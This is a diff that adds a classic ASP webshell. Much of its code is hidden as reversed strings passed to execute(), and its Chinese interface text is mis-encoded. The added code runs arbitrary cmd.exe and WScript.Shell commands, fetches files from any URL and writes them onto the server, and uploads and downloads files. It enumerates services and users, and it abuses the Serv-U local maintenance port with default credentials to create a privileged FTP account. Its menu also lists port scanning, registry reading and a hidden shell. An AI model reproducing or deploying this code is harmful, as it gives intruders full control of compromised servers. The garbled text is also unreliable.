4=<)2ssap(neL fi��8<)2ssap(neL elihW oD����=2ssap��1mun,2ssap mid��ezimodnaR��nehT ��tsoP��=)��2noitcA��(tseuqeR fI��"))
+End Function
+
+
+Function suftp()
+execute(shisanfun("fi dne��gnihton=3TSOPx teS��)sevael(dneS.3tsoPx��eurT ,��sevael/��& trop &��:1.0.0.721//:ptth�� ,��TSOP�� nepO.3tsoPx��)��PTTHLMX.2LMXSM��(tcejbOetaerC = 3tsoPx teS��flrcbv & resut & ��=resU �� & flrcbv & tropt & ��=oNtroP-�� & flrcbv & ��0.0.0.0=PI-�� & flrcbv & ��RESUETELED-�� & sevael = sevael��flrcbv & ��ECNANETNIAM ETIS�� & sevael = sevael��flrcbv & dwp & �� ssaP�� & sevael = sevael��flrcbv & rsU & �� resU�� = sevael��esle��)��>RB<>rb<): �� & htapt & �� :��· �� & ssapt & �� :���ܩ� & �� �� & resut & �� :������ PTF������ִ����������( j��gnihton=TSOPx teS��)sevael(dneS.tsoPx��eurT ,��sevael/��& trop &��:1.0.0.721//:ptth�� ,��TSOP�� nepO.tsoPx��)��PTTHLMX.2LMXSM��(tcejbOetaerC = tsoPx teS��txeN emuseR rorrE nO��flrcbv & ��PDCLEMAWR|\�� & htapt & ��=sseccA �� & flrcbv & ��enoN=soitaR-�� & flrcbv & ��ralugeR=epyTdrowssaP-�� & flrcbv & ��metsyS=ecnanetniaM-���_ & flrcbv & ��0=mumixaMatouQ-�� & flrcbv & ��0=tnerruCatouQ-�� & flrcbv & ��0=tiderCsoitaR-�� & flrcbv & ��1=nwoDoitaR-���_ & flrcbv & ��1=pUoitaR-�� & flrcbv & ��0=eripxE-�� & flrcbv & ��1-=tuOemiTnoisseS-�� & flrcbv & ��006=tuOemiTeldI-�� & flrcbv & ��1-=sresUrNxaM-���_ & flrcbv & ��0=nwoDtimiLdeepS-�� & flrcbv & ��0=pUtimiLdeepS-�� & flrcbv & ��1-=PIrePnigoLsresUxaM-�� & flrcbv & ��0=elbanEatouQ-���_ & flrcbv & ��0=drowssaPegnahC-�� & flrcbv & ��0=nigoLwollAsyawlA-�� & flrcbv & ��0=neddiHediH-�� & flrcbv & ��0=eruceSdeeN-���_ & flrcbv & ��1=shtaPleR-�� & flrcbv & ��0=elbasiD-�� & flrcbv & ��=eliFseMnigoL-�� & flrcbv & ��\�� & htapt & ��=riDemoH-���_ & flrcbv & ssapt & ��=drowssaP-�� & flrcbv & resut & ��=resU-�� & flrcbv & tropt & ��=oNtroP-�� & flrcbv & ��0.0.0.0=PI-�� & flrcbv & ��PUTESRESUTES-�� & sevael = sevael��flrcbv & ��ECNANETNIAM ETIS�� & sevael = sevael��flrcbv & dwp & �� ssaP�� & sevael = sevael��flrcbv & rsU & �� resU�� = sevael��nehT ��dda�� = )��nottuboidar��(mroF.tseuqer fi��)��dmcd��(mroF.tseuqer = dnammoC'��)��tropt��(mroF.tseuqer = tropt��)��htapt��(mroF.tseuqer = htapt��)��ssapt��(mroF.tseuqer = ssapt��)��resut��(mroF.tseuqer = resut��)��tropd��(mroF.tseuqer = trop��)��dwpd��(mroF.tseuqer = dwp��)��resud��(mroF.tseuqer = rsU���>retnec/<>mrof/<>elbat/<>rt/<>dt/<>'1'=eulav 'noitca'=di 'neddih'=epyt 'noitcaUS'=eman tupni<>'teseR'=eulav '2timbuS'=eman 'teser'=epyt tupni<;psbn&>'oG tsuJ'=eulav 'timbuS'=eman 'timbus'=epyt tupni<>d=di '2'=napsloc dt<>'elddim'=ngilav 'retnec'=ngila rt<>rt/<>dt/<��ɾ��ȷ>d=di 'xoBtxeT'=ssalc 'led'=eulav 'nottuboidar'=eman 'oidar'=epyt tupni<;psbn&������ȷ>d=di 'xoBtxeT'=ssalc dekcehc 'dda'=eulav 'oidar'=epyt 'nottuboidar'=eman tupni<>d=di dt<>dt/<��������ִ>d=di dt<>'retnec'=ngila rt<>rt/<>dt/<>'12'=eulav 'tropt'=di 'xoBtxeT'=ssalc 'txet'=epyt 'tropt'=eman tupni<>d=di dt<>dt/<���ڶ����>d=di dt<>'retnec'=ngila rt<>rt/<>dt/<>'\:C'=eulav 'htapt'=di 'xoBtxeT'=ssalc 'txet'=epyt 'htapt'=eman tupni<>d=di dt<>dt/<����·�ʷ�>d=di dt<>'retnec'=ngila rt<>rt/<>dt/<>'1'=eulav 'ssap'=di 'xoBtxeT'=ssalc 'txet'=epyt 'ssapt'=eman tupni<>d=di dt<>dt/<����ڼ���>d=di dt<>'retnec'=ngila rt<>rt/<>dt/<>'redavni'=eulav 'resut'=di 'xoBtxeT'=ssalc 'txet'=epyt 'resut'=eman tupni<>d=di dt<>dt/<�����˼���>d=di dt<>'retnec'=ngila rt<>rt/<>dt/<>'85934'=eulav 'tropd'=di 'xoBtxeT'=ssalc 'txet'=epyt 'tropd'=eman tupni<>d=di dt<>dt/<���ڶ�ͳϵ>d=di dt<>'retnec'=ngila rt<>rt/<>dt/<>'P@0;kl.#ka$@l#'=eulav 'dwpd'=di 'xoBtxeT'=ssalc 'txet'=epyt 'dwpd'=eman tupni<>d=di dt<>dt/<�����ͳϵ>d=di dt<>'retnec'=ngila rt<>rt/<>dt/<>'rotartsinimdAlacoL'=eulav 'resud'=di 'xoBtxeT'=ssalc 'txet'=epyt 'resud'=eman tupni<>d=di dt<>dt/<������ͳϵ>d=di dt<>'retnec'=ngila rt<>rt/<>dt/<>b/<Ϣ�ű���ɼ�>B< >tnof/<8>sgnidbew=ecaf tnof<>s=di '2'=napsloc dt<>'elddim'=ngilav 'retnec'=ngila rt<>'005'=htdiw elbat<>''=noitca 'tsop'=dohtem '1mrof'=eman mrof<>rb<>retnec<��j��"))
+End Function
+
+
+
+Function MainMenu()
+execute(shisanfun("��>elbat/<��j��:��>elbat/<>rt/<>dt/<��&thgirypoC&��>rh<>'der:roloc'=elyts retnec=ngila dt<>rt<��j��:��>rt/<>dt/<>a/<¼�dz���>->'pot_'=tegrat 'tuogoL=noitcA?'=ferh a<>'22'=thgieh dt<>rt<��j�����:��>rt/<>dt/<>a/<ѯ��Ů��>->'knalb_'=tegrat '+ѯ+��+=ntb&��&1rts&��=lru?xpsa.toboR/slooT/moc.zanihc.loot//:ptth'=ferh a<>'22'=thgieh dt<>rt<��j��:��>rt/<>dt/<>a/<ѯ�����>->'emarFeliF'=tegrat '��&1rts&��/llaetis/moc.nahzia.www//:ptth'=ferh a<>'22'=thgieh dt<>rt<��j��:��>rt/<>dt/<>a/<ѯ���ͬ>->'emarFeliF'=tegrat '��&1rts&��=w?xpsa.411/pi/moc.tseb411.www//:ptth'=ferh a<>'22'=thgieh dt<>rt<��j��:��>rt/<>dt/<>a/<ѯ����Ȩ>->'emarFeliF'=tegrat '0=epyTtros&��&1rts&��=tsoh?xpsa.trosudiab/moc.zanihc.lootym//:ptth'=ferh a<>'22'=thgieh dt<>rt<��j��:��>rt/<>dt/<>a/<��������>->'emarFeliF'=tegrat 'eliForP=noitcA?'=ferh a<>'22'=thgieh dt<>rt<��j��:��>rt/<>dt/<>a/<¼Ŀ�����>->'emarFeliF'=tegrat '')���redloFweN���,����&)��\\..fnc_itv\��&)��htaPredloF��(noisseS(htaPeR&����(mroFlluF:tpircsavaj'=ferh a<>'22'=thgieh dt<>rt<��j��:��>rt/<>dt/<>a/<Ȩ��-uvreS>->'emarFeliF'=tegrat 'uvreS=noitcA?'=ferh a<>'22'=thgieh dt<>rt<��j��:��>rt/<>dt/<>a/<��PTF---uS>->'emarFeliF'=tegrat 'ptfus=noitcA?'=ferh a<>'22'=thgieh dt<>rt<��j��:��>rt/<>dt/<>a/<AS-----LQS>->'emarFeliF'=tegrat 'DMM=noitcA?'=ferh a<>'22'=thgieh dt<>rt<��j��:��>rt/<>dt/<>a/<����ɨ�ڶ�>->'emarFeliF'=tegrat 'troPnacS=noitcA?'=ferh a<>'22'=thgieh dt<>rt<��j��:��>rt/<>dt/<>a/<����עȡ��>->'emarFeliF'=tegrat 'GERdaeR=noitcA?'=ferh a<>'22'=thgieh dt<>rt<��j��:��>rt/<>dt/<>a/<����---LQS>->'emarFeliF'=tegrat '/lqs/rekc4h/moc.pxeyado//:ptth'=ferh a<>'22'=thgieh dt<>rt<��j��:��>rt/<>dt/<>a/<����__�ڶ�>->'emarFeliF'=tegrat 'ofnIlanimreTteg=noitcA?'=ferh a<>'22'=thgieh dt<>rt<��j��:��>rt/<>dt/<>a/<erehwynacP>->'emarFeliF'=tegrat '4erehwynacp=noitcA?'=ferh a<>'22'=thgieh dt<>rt<��j��:��>rt/<>dt/<>a/<Ȩ��nimdaR>->'emarFeliF'=tegrat 'nimdar=noitcA?'=ferh a<>'22'=thgieh dt<>rt<��j��:��>rt/<>dt/<>a/<����__����>->'emarFeliF'=tegrat 'hcraeST=noitcA?'=ferh a<>'22'=thgieh dt<>rt<��j��:��>rt/<>dt/<>a/<����--����>->'emarFeliF'=tegrat 'daolpu=noitcA?'=ferh a<>'22'=thgieh dt<>rt<��j��:��>rt/<>dt/<>a/<����__����>->der=roloc tnof<>'emarFeliF'=tegrat '��&OOOO&��\.\\=htaPrewoP&rewoPtidE=noitcA?'=ferh a<>'22'=thgieh dt<>rt<��j��:��>rt/<>dt/<>a/<����__����>->der=roloc tnof<>'emarFeliF'=tegrat '/ukout/rekc4h/moc.pxeyado//:ptth'=ferh a<>'22'=thgieh dt<>rt<��j��:��>rt/<>dt/<>a/<����__����>->der=roloc tnof<>'emarFeliF'=tegrat 'llehsneddih=noitcA?'=ferh a<>'22'=thgieh dt<>rt<��j��fI dnE��:��>rt/<>dt/<>a/<����м���>->'emarFeliF'=tegrat 'bdMoTddAegaP=noitcA?'=ferh a<>'22'=thgieh dt<>rt<��j��:��>rt/<>dt/<>a/<��̽--����>->'emarFeliF'=tegrat 'php=noitcA?'=ferh a<>'22'=thgieh dt<>rt<��j��:��>rt/<>dt/<>a/<��Ȩ--�̴�>->'emarFeliF'=tegrat 'mroFevirDnacS=noitcA?'=ferh a<>'22'=thgieh dt<>rt<��j��:��>rt/<>dt/<>a/<2DMC--��ִ>->'emarFeliF'=tegrat 'xdmc=noitcA?'=ferh a<>'22'=thgieh dt<>rt<��j��:��>rt/<>dt/<>a/<DMC---��ִ>->'emarFeliF'=tegrat 'llehS1dmC=noitcA?'=ferh a<>'22'=thgieh dt<>rt<��j��:��>rt/<>dt/<>a/<����--����>->'emarFeliF'=tegrat 'eliFpU=noitcA?'=ferh a<>'22'=thgieh dt<>rt<��j��:��>rt/<>dt/<>a/<����--����>->'emarFeliF'=tegrat 'eliFtidE=noitcA?'=ferh a<>'22'=thgieh dt<>rt<��j��:��>rt/<>dt/<>a/<�Ŀ--����>->')���redloFweN���,����&)��elifweN\��&)��htaPredloF��(noisseS(htaPeR&����(mroFlluF:tpircsavaj'=ferh a<>'22'=thgieh dt<>rt<��j��:��>rt/<>dt/<>a/<¼Ŀ���ϻ�>->'emarFeliF'=tegrat 'kcabog=noitcA?'=ferh a<>'22'=thgieh dt<>rt<��j��:��>rt/<>dt/<>a/<�Ŀ��̱�>->')����&)htaPtooR(htaPeR&����(redloFwohS:tpircsavaj'=ferh a<>'22'=thgieh dt<>rt<��j���>rt/<>dt/<>a/<¼Ŀ����վ>->')����&)tooRWWW(htaPeR&����(redloFwohS:tpircsavaj'=ferh a<> 59=htdiw d=di dt<>rt<>0=redrob elbat<>retnec=ngila ���pot���=ngilav dt<>rt<>rt/<>dt/<>elbat/<��j��gnihtoN=CBA teS:)(revirDwohS.CBA j:FBL weN=CBA teS���eslE���>rt/<>dt/<��Ȩ��>'42'=thgieh dt<>rt<��j��nehT ��� ��=)1,0(TbO fI���>���'enon'=yalpsid.elyts.1unem���=tuoesuomno ���'enon'=yalpsid;%001:htdiw���=elyts1unem=di vid<>���''=yalpsid.elyts.1unem���=revoesuomno 42=thgieh dt<>rt<��j"))
+end function
+function Cmdx()
+execute(shisanfun(")��>retnec/<>aeratxet/<��(j: lladaer.tuodts.))��dmc��(tseuqer&��c/ ��&)��xdmc��(tseuqer(cexe.nhltpircSo j: fi dne�� lladaer.tuodts.))��dmc��(tseuqer&��c/ exe.dmc��(cexe.nhltpircSo j��neht ��exe.dmc��=)��xdmc��(tseuqer fi:txeN emuseR rorrE nO:)�� >72=swor 051=sloc ylnodaer aeratxet<��(j:)�� >mrof/<>'tibmuS'=eulav timbus=epyt tupni<��(j:)�� >rb<>06=ezis 'dmc'=eman txet=epyt tupni<��(j:)�� >rb<>'exe.dmc'=eulav 06=ezis 'xdmc'=eman txet=epyt tupni<��(j:)�� >'tsop'=dohtem mrof<>retnec<��(j��"))
+end function
+Function Course()
+SI="<br><table width='80%' align='center'><tr><td height='20' colspan='3' align='center' id=s><b>ϵͳ�û������</b></td></tr>"
+on error resume next
+for each obj in getObject("WinNT://.")
+err.clear
+if OBJ.StartType="" then
+SI=SI&"<tr><td height=""20"" id=d>&nbsp;"&obj.Name&"</td><td id=d>&nbsp;ϵͳ�û�(��)</td></tr><tr>" 
+end if
+if OBJ.StartType=2 then lx="�Զ�"
+if OBJ.StartType=3 then lx="�ֶ�"
+if OBJ.StartType=4 then lx="����"
+if LCase(mid(obj.path,4,3))<>"win" and OBJ.StartType=2 then
+SI1=SI1&"<tr><td height=""20"" id=d>&nbsp;"&obj.Name&"</td><td height=""20"" id=d>&nbsp;"&obj.DisplayName&"<tr><td height=""20"" id=d colspan=""2"">[��������:"&lx&"]<font>&nbsp;"&obj.path&"</font></td></tr>"
+else
+SI2=SI2&"<tr><td height=""20"" id=d>&nbsp;"&obj.Name&"</td><td height=""20"" id=d>&nbsp;"&obj.DisplayName&"<tr><td height=""20"" bgcolor=""#FFFFFF"" colspan=""2"">[��������:"&lx&"]<font color=#3399FF>&nbsp;"&obj.path&"</font></td></tr>"
+end if
+next
+j SI&SI0&SI1&SI2&"</table>"
+End Function
+respnose.Write strBAD&Action
+Function IIf(var, val1, val2)
+If var=True Then
+IIf=val1
+Else
+IIf=val2
+End If
+End Function
+Function GetTheSizes(num)
+Dim i, arySize(4)
+arySize(0)="B"
+arySize(1)="KB"
+arySize(2)="MB"
+arySize(3)="GB"
+arySize(4)="TB"
+While(num / 1024 >= 1)
+num=Fix(num / 1024 * 100) / 100
+i=i + 1
+WEnd
+GetTheSizes=num&" "&arySize(i)
+End Function
+Function HtmlEncodes(str)
+If IsNull(str) Then Exit Function
+HtmlEncodes=Server.HTMLEncode(str)
+End Function
+
+function downfile(path)
+execute(shisanfun("gnihton = mso tes��esolc.mso��hsulf.esnopser��daer.mso etirwyranib.esnopser���maerts-tetco/noitacilppa�� = epyttnetnoc.esnopser���8-ftu�� = tesrahc.esnopser��ezis.mso ,��htgnel-tnetnoc�� redaehdda.esnopser��)zs,htap(dim & ��=emanelif ;tnemhcatta�� ,��noitisopsid-tnetnoc�� redaehdda.esnopser��1+)��\��,htap(verrtsni=zs��htap elifmorfdaol.mso��1 = epyt.mso��nepo.mso��))0,6(tbo(tcejboetaerc = mso tes��raelc.esnopser��"))
+end function
+function htmlencode(s)
+  if not isnull(s) then
+    s = replace(s, ">", ">")
+    s = replace(s, "<", "<")
+    s = replace(s, chr(39), "'")
+    s = replace(s, chr(34), """")
+    s = replace(s, chr(20), " ")
+    htmlencode = s
+  end if
+end function
+Function UpFile(): 
+execute(shisanfun("����&lruypoc&���j���>elbat/<>mrof/<>rt/<>dt/<>'����'=eulav 'timbuS'=eman 'timbus'=epyt tupni< >'52'=ezis  'elif'=epyt 'eliFlacoL'=eman tupni<>'04'=ezis '��&)��exe.dmC\��&)��htaPredloF��(noisseS(htaPeRR&��'=eulav 'htaPoT'=eman tupni<����·����>dt<>rt<>'atad-mrof/trapitlum'=epytcne 'tsoP=2noitcA&eliFpU=noitcA?��&LRU&��'=noitca 'tsop'=dohtem 'mroFpU'=eman mrof<>'retnec'=ngila '0'=gnicapsllec '0'=gniddapllec '0'=redrob elbat<>rb<>rb<>rb<��j  ��fI dnE  ��dnE.esnopseR ��)(rrEwohS ��IS j ��lrUkcaB&IS=IS ��gnihton=U teS��gnihton=F teS��fI dnE ��fi dnE  ���>retnec/<�����ɩ�&�崫��&���ϩ�&emaNU&�����>rb<>rb<>rb<>retnec<��=IS ��nehT 0=rebmun.rrE fI ��emaNU sAevaS.F ��eslE  ��txen emuser rorre no���!���ϩ�&����ĸ�һ��&����ѡ��·��&��ȫ��ĩ�&�崫�����&������>rb<��=IS  ��neht 0=eziSeliF.F rO ���=emaNU fI ��)��htaPoT��(mrof.U=emaNU��)��eliFlacoL��(AU.U=F teS�� CPU wen=U teS��nehT ��tsoP��=)��2noitcA��(tseuqeR fI"))
+End Function
+function cmd1shell()
+execute(shisanfun("is j���>mrof/<>aeratxet/<��&)31(rhc&is=is��fi dne��fi dne��aaa&is=is��)eurt ,elifpmetzs(elifeteled.osf llac��esolc.xclelifo��)lladaer.xclelifo(edocnelmth.revres=aaa��)0 ,eslaf ,1 ,elifpmetzs( eliftxetnepo.sf = xclelifo tes��)��tcejbometsyselif.gnitpircs��(tcejboetaerc = sf tes��)eurt ,0 ,elifpmetzs & �� > �� & dmcfed & �� c/ ��&htapllehs( nur.sw llac��)��txt.dmc��(htappam.revres = elifpmetzs��)��tcejbometsyselif.gnitpircs��(tcejboetaerc.revres=osf tes��)��llehs.tpircsw��(tcejboetaerc.revres=sw tes��)��llehs.tpircsw��(tcejboetaerc.revres=sw tes��txen emuser rorre no��esle��aaa&is=is��lladaer.tuodts.dd=aaa��)dmcfed&�� c/ ��&htapllehs(cexe.mc=dd tes��))0,1(tbo(tcejboetaerc=mc tes��neht ��sey��=)��tpircsw��(mrof.tseuqer fi��neht ���><)��dmc��(mrof.tseuqer fi���>'dmc'=ssalc ';044:thgieh;%001:htdiw'=elyts aeratxet<>'��ִ'=eulav 'timbus'=epyt tupni< >'��&dmcfed&��'=eulav '%29:htdiw'=elyts 'dmc'=eman tupni<llehs.tpircsw>��&dekcehc&��'sey'=eulav 'tpircsw'=eman 'xobkcehc'=epyt c=ssalc tupni<>'%07:htdiw'=elyts '��&htapllehs&��'=eulav 'ps'=eman tupni<����·llehs>'tsop'=dohtem mrof<��=is��)��dmc��(tseuqer = dmcfed neht ���><)��dmc��(tseuqer fi����=dekcehc neht ��sey��><)��tpircsw��(tseuqer fi���exe.dmc�� = htapllehs neht ���=htapllehs fi��)��htapllehs��(noisses=htapllehs��)��ps��(tseuqer = )��htapllehs��(noisses neht ���><)��ps��(tseuqer fi���dekcehc ��=dekcehc��"))
+end function
+Function upload()
+j"<br><table width='80%' bgcolor='menu' border='0' cellspacing='1' cellpadding='0' align='center'>" 
+j"��ʱ�رմ˹���"
+j" ���ص�������:�޻���...Ϊ�˽�ʡ.�����޻���<hr/>"
+j"<form method=post>"
+j"<select onChange='this.form.theUrl.value=this.value;'>"
+j"<option value=''>��������</option>"
+j"<input name=theUrl value='http://' size=80><input type=submit value=' ���� '><br/>"
+j"<input name=thePath value='" & HtmlEncode(Server.MapPath(".")) & "\' size=80>"
+j"<input type=checkbox name=overWrite value=2>���ڸ��ǡ�"
+j"<input type=hidden value=downFromUrl name=theAct>"
+j"</form>"
+j"<hr/>"
+If isDebugMode = False Then
+On Error Resume Next
+End If:Dim Http, theUrl, thePath, stream, fileName, overWrite
+theUrl = Request("theUrl")
+thePath = Request("thePath")
+overWrite = Request("overWrite")
+Set stream = Server.CreateObject("ad"&e&"odb.st"&e&"ream")
+Set Http = Server.CreateObject("MSXML2.XMLHTTP")
+If overWrite <> 2 Then:overWrite = 1:End If
+Http.Open "GET", theUrl, False
+Http.Send()
+If Http.ReadyState <> 4 Then 
+End If
+With stream
+.Type = 1
+.Mode = 3
+.Open
+.Write Http.ResponseBody
+.Position = 0
+.SaveToFile thePath, overWrite
+If Err.Number = 3004 Then
+Err.Clear
+fileName = Split(theUrl, "/")(UBound(Split(theUrl, "/")))
+If fileName = "" Then
+fileName = "index.htm.txt"
+End If
+thePath = thePath & "\" & fileName
+.SaveToFile thePath, overWrite
+j"error,��������Ϊ�ļ��Ѵ��ڣ������ع��̺͵�ַ�г� �ִ��� �� �ļ������� ��Ϊ���ֽڣ���"
+End If
+.Close
+End With
+chkErr(Err)
+Set Http = Nothing
+Set Stream = Nothing
+If isDebugMode = False Then
+On Error Resume Next
+End If
+If Request("ice")="fso" Then
+response.Redirect str1&"test.aspx"
+elseif Request("ice")="fsos" then
+response.Redirect str1&"test.php"
+elseif Request("ice")="jztxt" then
+response.Redirect "http://"&serveru&"/global.asa"
+elseif Request("ice")="killdoor" then
+response.Redirect str1&"killdoor.asp"
+end if
+End Function:Function TSearch():dim st:st=timer():RW="<br><table width='600' bgcolor='' border='0' cellspacing='1' cellpadding='0' align='center'><form method='post'>"
+  RW=RW & "<tr><td height='20' align='center' bgcolor=''>��������</td></tr>"
+  RW=RW & "<tr><td bgcolor=''>&nbsp;·&nbsp;&nbsp;����<input name='SFpath' value='" & WWWRoot & "' style='width:390'>&nbsp;ע:��·��ʹ��"",""������.</td></tr>"
+  RW=RW & "<tr><td bgcolor=''>&nbsp;�ļ�����<input name='Sfk' style='width:200'>&nbsp;<input type='submit' value='����' class='submit'>&nbsp;[����Ҳ��]</td></tr>"  
+  RW=RW & "</form></table>"
+  j RW : RW=""
+  if Request.Form("Sfk")<>"" then
+  Set newsearch=new SearchFile
+  newsearch.Folders=trim(Request.Form("SFpath"))
+  newsearch.keyword=trim(Request.Form("Sfk"))
+  newsearch.Search
+  Set newsearch=Nothing
+  j"�M�r��"&(timer()-st)*1000&"����<hr>"
+  end if
+End Function 
+
+Class SearchFile
+ dim Folders,keyword,objFso,Counter
+ Private Sub Class_Initialize
+  Set objFso=Server.CreateObject(ObT(0,0))
+  Counter=0
+ End Sub
+ Private Sub Class_Terminate
+    Set objFso=Nothing
+ End Sub
+ Function Search
+  Folders=split(Folders,",")
+  flag=instr(keyword,"\") or instr(keyword,"/")
+  flag=flag or instr(keyword,":")
+  flag=flag or instr(keyword,"|")
+  flag=flag or instr(keyword,"&")
+  if flag then
+    j"<table align='center' width='600'><hr><p align='center'><font color='red'>�P�I�ֲ��ܰ���/\:|&</font><br>"
+
+ Exit Function
+  else
+    j"<table align='center' width='600'><hr>"
+  end if
+  dim i
+  for i=0 to ubound(Folders)
+    Call GetAllFile(Folders(i))
+  next
+  j"<p align='center'>��������<font color='red'>"&Counter&"</font>���Y��<br>"
+ End Function
+ Private Function GetAllFile(Folder)
+  dim objFd,objFs,objFf
+  Set objFd=objFso.GetFolder(Folder)
+  Set objFs=objFd.SubFolders
+  Set objFf=objFd.Files
+  dim strFdName
+  On Error Resume Next
+  For Each OneDir In objFs
+    strFdName=OneDir.Name
+    If strFdName<>"Config.Msi" EQV strFdName<>"RECYCLED" EQV strFdName<>"RECYCLER" EQV strFdName<>"System Volume Information" Then 
+      SFN=Folder&"\"&strFdName
+      Call GetAllFile(SFN)
+ End If
+  Next
+  dim strFlName
+  For Each OneFile In objFf
+    strFlName=OneFile.Name
+    If strFlName<>"desktop.ini" EQV strFlName<>"folder.htt" Then
+      FN=Folder&"\"&strFlName
+   Counter=Counter+ColorOn(FN)
+ End If
+  Next
+  Set objFd=Nothing
+  Set objFs=Nothing
+  Set objFf=Nothing
+ End Function
+ Private Function CreatePattern(keyword)   
+   CreatePattern=keyword
+   CreatePattern=Replace(CreatePattern,".","\.")
+   CreatePattern=Replace(CreatePattern,"+","\+")
+   CreatePattern=Replace(CreatePattern,"(","\(")
+   CreatePattern=Replace(CreatePattern,")","\)")
+   CreatePattern=Replace(CreatePattern,"[","\[")
+   CreatePattern=Replace(CreatePattern,"]","\]")
+   CreatePattern=Replace(CreatePattern,"{","\{")
+   CreatePattern=Replace(CreatePattern,"}","\}")
+   CreatePattern=Replace(CreatePattern,"*","[^\\\/]*")
+   CreatePattern=Replace(CreatePattern,"?","[^\\\/]{1}")
+   CreatePattern="("&CreatePattern&")+"
+ End Function
+ Private Function ColorOn(FileName)
+execute(shisanfun("gnihtoN=geRjbo teS   ��fi dne   ��0=nOroloC     ��esle   ��1=nOroloC  ��hsulf.esnopseR  ��tuPtuO j  ��tuPtuO & ))��\��,emaNeliF(veRrtsnI,1,emaNeliF(diM & ��;psbn&>'006'=htdiw 'retnec'=ngila elbat<��=tuPtuO     ��)��>tnof/<1$>''=roloc tnof<��,)1+)��\��,emaNeliF(veRrtsnI,emaNeliF(diM(ecalpeR.geRjbo=tuPtuO     ��neht laVter fi   ��))1+)��\��,emaNeliF(veRrtsnI,emaNeliF(diM(tseT.geRjbo=laVter   ��eurT=labolG.geRjbo   ��eurT=esaCerongI.geRjbo   ��)drowyek(nrettaPetaerC=nrettaP.geRjbo   ��pxEgeR wen=geRjbo teS   ��geRjbo mid   "))
+ End Function
+End Class
+
+
+execute(shisanfun("��noitcnuf dnE:fI dnE:��)'����¼Ŀ��վ�ڲ�����'(trela���=kcilcno ���###��=lrUnepo:eslE:��knalb_���=tegrat ����&lrUeht&��/��=lrUnepo:fI dnE:)2 ,lrUeht(diM = lrUeht:nehT ��/�� = )1 ,lrUeht(tfeL fI:)��/�� ,��\�� ,lrUeht(ecalpeR = lrUeht:)1 + )htaPeht(neL ,htaPesu(diM = lrUeht:nehT )htaPeht(esaCL = )))htaPeht(neL ,htaPesu(tfeL(esaCL fI:)��/��(htaPpaM.revreS = htaPeht:htaPeht ,lrUeht miD:)htaPesu(lrUnepo noitcnuf:noitcnuF dnE:fi dne:��B�� & eziSeht = eziSehTteg: nehT 4201< eziSeht dnA 0 => eziSeht fI:fi dne:��K�� & 001 / )001 * )4201 / eziSeht((xiF = eziSehTteg: nehT )4201 * 4201( < eziSeht dnA 4201 => eziSeht fI:fi dne:��M�� & 001 / )001 * ))4201 * 4201( / eziSeht((xiF = eziSehTteg: nehT )4201 * 4201 * 4201( < eziSeht dnA )4201 * 4201( => eziSeht fI:fi dne:��G�� & 001 / )001 * ))4201 * 4201 * 4201( / eziSeht((xiF = eziSehTteg: nehT )4201 * 4201 * 4201( => eziSeht fI:)eziSeht(eziSehTteg noitcnuF:noitcnuF dnE:fi dne:��>���'��&htaPrewoP&��=htaPrewoP&2=epyTevaS&rewoPevaS=noitcA?'=ferh.noitacol���=kcilcno ����=eulav nottub=epyt tupni< >tnof/<����δ>26FF26#=roloc tnof<�� = setubirttAteg:esle:��>���'��&htaPrewoP&��=htaPrewoP&1=epyTevaS&rewoPevaS=noitcA?'=ferh.noitacol���=kcilcno ����=eulav nottub=epyt tupni< >tnof/<������>der=roloc tnof<�� = setubirttAteg: neht 0=KOtidE fi:)��\\��,��\��,htaPrewoP(ecalper=htaPrewoP:fI dnE:0=KOtidE:1 - eulaVtni = eulaVtni:nehT 1 => eulaVtni fI:fI dnE:0=KOtidE:2 - eulaVtni = eulaVtni:nehT 2 => eulaVtni fI:fI dnE:0=KOtidE:4 - eulaVtni = eulaVtni:nehT 4 => eulaVtni fI:fI dnE:8 - eulaVtni = eulaVtni:nehT 8 => eulaVtni fI:fI dnE:61 - eulaVtni = eulaVtni:nehT 61 => eulaVtni fI:fI dnE:23 - eulaVtni = eulaVtni:nehT 23 => eulaVtni fI:fI dnE:46 - eulaVtni = eulaVtni:nehT 46 => eulaVtni fI:fI dnE:821 - eulaVtni = eulaVtni:nehT 821 => eulaVtni fI:1=KOtidE:KOtidE miD:)htaPrewoP,eulaVtni(setubirttAteg noitcnuF:noitcnuF dnE:eltiTrts = eltiTyMteg:)htaPrewoP,setubirttA.enOeht(setubirttAteg & �� :̬״��Ȩǰ��>rb<�� & eltiTrts = eltiTrts:desseccAtsaLetaD.enOeht & �� :�ʷú���>rb<�� & eltiTrts = eltiTrts:deifidoMtsaLetaD.enOeht & �� :���޺���>rb<�� & eltiTrts = eltiTrts: detaerCetaD.enOeht & �� :��ʱ����>rb<�� & eltiTrts = eltiTrts: )eziS.enOeht(eziSehTteg & �� :С��>rb<�� & eltiTrts = eltiTrts: ��� & htaP.enOeht & �� :��·>rb<�� & eltiTrts = eltiTrts:eltiTrts miD:)htaPrewoP,enOeht(eltiTyMteg noitcnuF:bus dne:gnihtoN = eliFeht teS:)htaPrewoP,eliFeht(eltiTyMteg j:)htaPrewoP(eliFteG.Xosf = eliFeht teS:)���,�����,htaPrewoP(ecalper=htaPrewoP:)htaPrewoP(rewoPtidE bus:bus dne:gnihtoN = eliFeht teS:fi dne:��>tpircs/<;)(esolc.wodniw;)(daoler.noitacol.renepo.wodniw;)'�����ɶ�������'(trela>'tpircsavaj'=egaugnal tpircs<�� j:7=setubirttA.eliFeht:esle:��>tpircs/<;)(esolc.wodniw;)(daoler.noitacol.renepo.wodniw;)'�����⹦���Ѽ���'(trela>'tpircsavaj'=egaugnal tpircs<�� j:23=setubirttA.eliFeht:neht 1=epyTevaS fi:)htaPrewoP(eliFteG.Xosf = eliFeht teS:)epyTevaS,htaPrewoP(rewoPevaS bus��"))
+
+Function ScReWr(folder)
